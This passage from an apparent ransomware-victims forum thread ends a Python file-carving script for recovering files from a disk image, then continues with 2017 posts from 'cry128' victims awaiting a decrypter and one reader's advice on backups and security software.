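    png = b"\x89PNG\r\n\x1a\n" + b"\x00\x00\x00\x0dIHDR" + b"\x00" * 17 + b"IEND\xaeB`\x82"
    dwg = b"AC1027" + b"\x00" * 26 + b"drawing body..."
    # Stand-in for an encrypted file: high-entropy-looking bytes with no signature in them.
    encrypted = bytes((i * 73 + 11) & 0xFF for i in range(2 * SECTOR))
    return pad(pdf) + blank + pad(png) + encrypted + pad(dwg) + blank


if __name__ == "__main__":
    for kind, start, end in summarize(carve(build_sample_image())):
        print(f"{kind:5s} at sector {start // SECTOR:3d}  bytes {start}..{end}")
```

Against a real drive you would read the image from a write-blocked copy (for example `carve(Path("disk.img").read_bytes())`, or in chunks for a large disk) and write each `Carved.data` out under a new name; the results are only as good as what has not yet been overwritten, which is why stopping the machine early matters more than anything else on the day of the infection.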
Frank chen (Posted May 17, 2017)
Can we know what the progress of the cry128 36b variant decrypter is now? I am about to graduate in 1 month and all my MATLAB code is encrypted. I am not sure if I should pay or wait for you guys to save me. @Kevin Zoll May God bless you.
chx (Posted May 17, 2017)
Like you, a victim of the cry128 36-byte variant since 07/05/2017, I read the topic three times a day, waiting patiently. Thanks & good luck.
kygiacomo (Posted May 17, 2017)
From what I have read on the Emsisoft blog, it's going to be nearly impossible to decrypt the files without getting some professionals that use forensic data recovery to get your files back, or paying the ransom. I hope everyone has learned a valuable lesson here and updates their OS, makes backups of files and gets proper internet security such as Emsisoft to protect your computers. I have Emsisoft Internet Security, Zemana and Malwarebytes on my system and I have yet to get any malware, viruses or ransomware on my computer.